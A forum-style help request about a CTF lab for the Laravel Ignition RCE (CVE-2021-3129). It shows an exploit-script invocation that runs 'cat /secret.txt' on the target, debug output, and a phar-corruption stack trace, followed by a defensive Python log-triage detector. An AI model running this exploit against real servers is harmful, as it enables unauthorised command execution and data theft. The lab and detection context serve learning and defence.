hey, sweet exploit and thanks for the code! wondering if you didn't mind helping on a CTF black-box engagement at all? (full transparency - Laravel Framework < 8.4.2 Remote Code Execution (CVE-2021-3129))
Laravel is a popular PHP framework used for developing web applications. Ignition is a debugging and error reporting tool used in Laravel and other products.
This laboratory contains the CVE-2021-3129 vulnerability found in Laravel framework versions below 8.4.2 and the Ignition debugging component versions below 2.5.2. This vulnerability allows attackers to perform remote code execution (RCE) attacks, enabling malicious users to execute arbitrary commands on the target system and potentially gain full control over the system.
What is the secret in the /secret.txt file?
i tried the script but get the output:
```bash
./exploit.py http://172.20.15.202/ Monolog/RCE1 'cat /secret.txt'
/Users/ads/git/CVE-2021-3129_exploit/./exploit.py:77: SyntaxWarning: invalid escape sequence '\s'
result = re.sub("{[\s\S]*}", "", response.text)
[i] Trying to clear logs
[+] Logs cleared
[+] PHPGGC found. Generating payload and deploy it to the target
[+] Successfully converted logs to PHAR
[i] There is no output
[i] Trying to clear logs
[+] Logs cleared
```
i added some additional debugging and log statements to the code for the HTTP requests and see:
output
```bash
./ads-exploit.py http://172.20.15.202 Monolog/RCE1 'cat /secret.txt 2>&1'
/Users/ads/git/CVE-2021-3129_exploit/./ads-exploit.py:80: SyntaxWarning: invalid escape sequence '\s'
result = re.sub("{[\s\S]*}", "", response.text)
[i] Trying to clear logs
[+] Logs cleared
[+] PHPGGC found. Generating payload and deploying it to the target
[+] Successfully converted logs to PHAR
[*] HTTP Status Code: 500
[*] HTTP Response Headers:
{'Date': 'Wed, 04 Jun 2025 10:23:35 GMT', 'Server': 'Apache/2.4.38 (Debian)', 'X-Powered-By': 'PHP/7.4.15', 'Cache-Control': 'no-cache, private', 'Connection': 'close', 'Transfer-Encoding': 'chunked', 'Content-Type': 'application/json'}
[*] Full response text:
{
"message": "file_get_contents(phar://../storage/logs/laravel.log): failed to open stream: internal corruption of phar "/var/www/storage/logs/laravel.log" (truncated entry)",
"exception": "ErrorException",
"file": "/var/www/vendor/facade/ignition/src/Solutions/MakeViewVariableOptionalSolution.php",
"line": 75,
"trace": [
{
"function": "handleError",
"class": "Illuminate\\Foundation\\Bootstrap\\HandleExceptions",
"type": "->"
},
{
"file": "/var/www/vendor/facade/ignition/src/Solutions/MakeViewVariableOptionalSolution.php",
"line": 75,
"function": "file_get_contents"
},
{
"file": "/var/www/vendor/facade/ignition/src/Solutions/MakeViewVariableOptionalSolution.php",
"line": 67,
"function": "makeOptional",
"class": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
"type": "->"
},
{
"file": "/var/www/vendor/facade/ignition/src/Http/Controllers/ExecuteSolutionController.php",
"line": 19,
"function": "run",
"class": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
"type": "->"
},
{
"file": "/var/www/vendor/laravel/framework/src/Illuminate/Routing/ControllerDispatcher.php",
"line": 48,
"function": "__invoke",
"class": "Facade\\Ignition\\Http\\Controllers\\ExecuteSolutionController",
"type": "->"
},
{
"file": "/var/www/vendor/laravel/framework/src/Illuminate/Routing/Route.php",
"line": 254,
"function": "dispatch",
"class": "Illuminate\\Routing\\ControllerDispatcher",
"type": "->"
},
{
"file": "/var/www/vendor/laravel/framework/src/Illuminate/Routing/Route.php",
"line": 197,
"function": "runController",
"class": "Illuminate\\Routing\\Route",
"type": "->"
},
{
"file": "/var/www/vendor/laravel/framework/src/Illuminate/Routing/Router.php",
"line": 693,
"function": "run",
"class": "Illuminate\\Routing\\Route",
"type": "->"
},
{
"file": "/var/www/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php",
"line": 128,
"function": "Illuminate\\Routing\\{closure}",
"class": "Illuminate\\Routing\\Router",
"type": "->"
},
{
"file": "/var/www/vendor/facade/ignition/src/Http/Middleware/IgnitionConfigValueEnabled.php",
"line": 25,
"function": "Illuminate\\Pipeline\\{closure}",
"class": "Illuminate\\Pipeline\\Pipeline",
"type": "->"
},
{
"file": "/var/www/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php",
"line": 167,
"function": "handle",
"class": "Facade\\Ignition\\Http\\Middleware\\IgnitionConfigValueEnabled",
"type": "->"
},
{
"file": "/var/www/vendor/facade/ignition/src/Http/Middleware/IgnitionEnabled.php",
"line": 23,
"function": "Illuminate\\Pipeline\\{closure}",
"class": "Illuminate\\Pipeline\\Pipeline",
"type": "->"
},
{
"file": "/var/www/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php",
"line": 167,
"function": "handle",
"class": "Facade\\Ignition\\Http\\Middleware\\IgnitionEnabled",
"type": "->"
},
{
"file": "/var/www/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php",
"line": 103,
"function": "Illuminate\\Pipeline\\{closure}",
"class": "Illuminate\\Pipeline\\Pipeline",
"type": "->"
},
{
"file": "/var/www/vendor/laravel/framework/src/Illuminate/Routing/Router.php",
"line": 695,
"function": "then",
"class": "Illuminate\\Pipeline\\Pipeline",
"type": "->"
},
{
"file": "/var/www/vendor/laravel/framework/src/Illuminate/Routing/Router.php",
"line": 670,
"function": "runRouteWithinStack",
"class": "Illuminate\\Routing\\Router",
"type": "->"
},
{
"file": "/var/www/vendor/laravel/framework/src/Illuminate/Routing/Router.php",
"line": 636,
"function": "runRoute",
"class": "Illuminate\\Routing\\Router",
"type": "->"
},
{
"file": "/var/www/vendor/laravel/framework/src/Illuminate/Routing/Router.php",
"line": 625,
"function": "dispatchToRoute",
"class": "Illuminate\\Routing\\Router",
"type": "->"
},
{
"file": "/var/www/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php",
"line": 166,
"function": "dispatch",
"class": "Illuminate\\Routing\\Router",
"type": "->"
},
{
"file": "/var/www/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php",
"line": 128,
"function": "Illuminate\\Foundation\\Http\\{closure}",
"class": "Illuminate\\Foundation\\Http\\Kernel",
"type": "->"
},
{
"file": "/var/www/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/TransformsRequest.php",
"line": 21,
"function": "Illuminate\\Pipeline\\{closure}",
"class": "Illuminate\\Pipeline\\Pipeline",
"type": "->"
},
{
"file": "/var/www/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php",
"line": 167,
"function": "handle",
"class": "Illuminate\\Foundation\\Http\\Middleware\\TransformsRequest",
"type": "->"
},
{
"file": "/var/www/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/TransformsRequest.php",
"line": 21,
"function": "Illuminate\\Pipeline\\{closure}",
"class": "Illuminate\\Pipeline\\Pipeline",
"type": "->"
},
{
"file": "/var/www/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php",
"line": 167,
"function": "handle",
"class": "Illuminate\\Foundation\\Http\\Middleware\\TransformsRequest",
"type": "->"
},
{
"file": "/var/www/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/ValidatePostSize.php",
"line": 27,
"function": "Illuminate\\Pipeline\\{closure}",
"class": "Illuminate\\Pipeline\\Pipeline",
"type": "->"
},
{
"file": "/var/www/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php",
"line": 167,
"function": "handle",
"class": "Illuminate\\Foundation\\Http\\Middleware\\ValidatePostSize",
"type": "->"
},
{
"file": "/var/www/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/PreventRequestsDuringMaintenance.php",
"line": 86,
"function": "Illuminate\\Pipeline\\{closure}",
"class": "Illuminate\\Pipeline\\Pipeline",
"type": "->"
},
{
"file": "/var/www/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php",
"line": 167,
"function": "handle",
"class": "Illuminate\\Foundation\\Http\\Middleware\\PreventRequestsDuringMaintenance",
"type": "->"
},
{
"file": "/var/www/vendor/fruitcake/laravel-cors/src/HandleCors.php",
"line": 37,
"function": "Illuminate\\Pipeline\\{closure}",
"class": "Illuminate\\Pipeline\\Pipeline",
"type": "->"
},
{
"file": "/var/www/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php",
"line": 167,
"function": "handle",
"class": "Fruitcake\\Cors\\HandleCors",
"type": "->"
},
{
"file": "/var/www/vendor/fideloper/proxy/src/TrustProxies.php",
"line": 57,
"function": "Illuminate\\Pipeline\\{closure}",
"class": "Illuminate\\Pipeline\\Pipeline",
"type": "->"
},
{
"file": "/var/www/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php",
"line": 167,
"function": "handle",
"class": "Fideloper\\Proxy\\TrustProxies",
"type": "->"
},
{
"file": "/var/www/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php",
"line": 103,
"function": "Illuminate\\Pipeline\\{closure}",
"class": "Illuminate\\Pipeline\\Pipeline",
"type": "->"
},
{
"file": "/var/www/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php",
"line": 141,
"function": "then",
"class": "Illuminate\\Pipeline\\Pipeline",
"type": "->"
},
{
"file": "/var/www/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php",
"line": 110,
"function": "sendRequestThroughRouter",
"class": "Illuminate\\Foundation\\Http\\Kernel",
"type": "->"
},
{
"file": "/var/www/html/index.php",
"line": 52,
"function": "handle",
"class": "Illuminate\\Foundation\\Http\\Kernel",
"type": "->"
}
]
}
[i] There is no output or output is empty
[i] Trying to clear logs
[+] Logs cleared
```
any ideas if i am doing something wrong here? tyia!
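
A defender-side reading of the 500 response in the post above, as an added example that is not part of the original post or of the exploit repository: the exception record shows a stream-wrapper path reaching `file_get_contents` inside Ignition's `MakeViewVariableOptionalSolution`, and records with that shape can be flagged in application error logs. It assumes exceptions are available as JSON lines with the `message`/`file`/`trace` fields shown above; `triage`, `scan` and the sample records are constructed for illustration.

```python
import json
import re
from typing import Optional

# Path argument of file_get_contents() that starts with a stream-wrapper scheme.
WRAPPER_CALL = re.compile(
    r"file_get_contents\((?P<scheme>[a-z][a-z0-9+.\-]*)://(?P<path>[^)]*)\)", re.I)
# Identifiers taken from the stack trace in the post.
SOLUTION_FILE = "facade/ignition/src/Solutions/MakeViewVariableOptionalSolution.php"
CONTROLLER = "Facade\\Ignition\\Http\\Controllers\\ExecuteSolutionController"


def triage(record: dict) -> Optional[dict]:
    """Return a finding when a stream wrapper reached Ignition's solution code."""
    match = WRAPPER_CALL.search(str(record.get("message", "")))
    if match is None:
        return None
    frames = [f for f in record.get("trace") or [] if isinstance(f, dict)]
    files = [str(record.get("file", ""))] + [str(f.get("file", "")) for f in frames]
    if not any(name.endswith(SOLUTION_FILE) for name in files):
        return None  # wrapper used elsewhere in the app, out of scope here
    via_controller = any(f.get("class") == CONTROLLER for f in frames)
    return {"scheme": match.group("scheme").lower(),
            "path": match.group("path"),
            "via_execute_solution": via_controller}


def scan(lines):
    """Triage JSON-lines exception records; skip lines that are not JSON objects."""
    findings = []
    for number, line in enumerate(lines, start=1):
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(record, dict) and (hit := triage(record)):
            findings.append({"line": number, **hit})
    return findings


# Constructed sample records, trimmed to the shape of the response in the post.
_SOLUTION = "/var/www/vendor/" + SOLUTION_FILE
SAMPLE = [
    json.dumps({"message": 'file_get_contents(phar://../storage/logs/laravel.log): failed to open stream: internal corruption of phar "/var/www/storage/logs/laravel.log" (truncated entry)',
                "file": _SOLUTION, "trace": [{"function": "__invoke", "class": CONTROLLER}]}),
    json.dumps({"message": "file_get_contents(/var/www/resources/views/welcome.blade.php): failed to open stream: No such file or directory",
                "file": _SOLUTION, "trace": []}),
    "not json",
    json.dumps({"message": "file_get_contents(https://example.invalid/feed): failed to open stream",
                "file": "/var/www/app/Http/Controllers/FeedController.php", "trace": []}),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Only the first sample record is reported: the second has no wrapper scheme, the third is not JSON, and the fourth uses a wrapper outside Ignition's solution code.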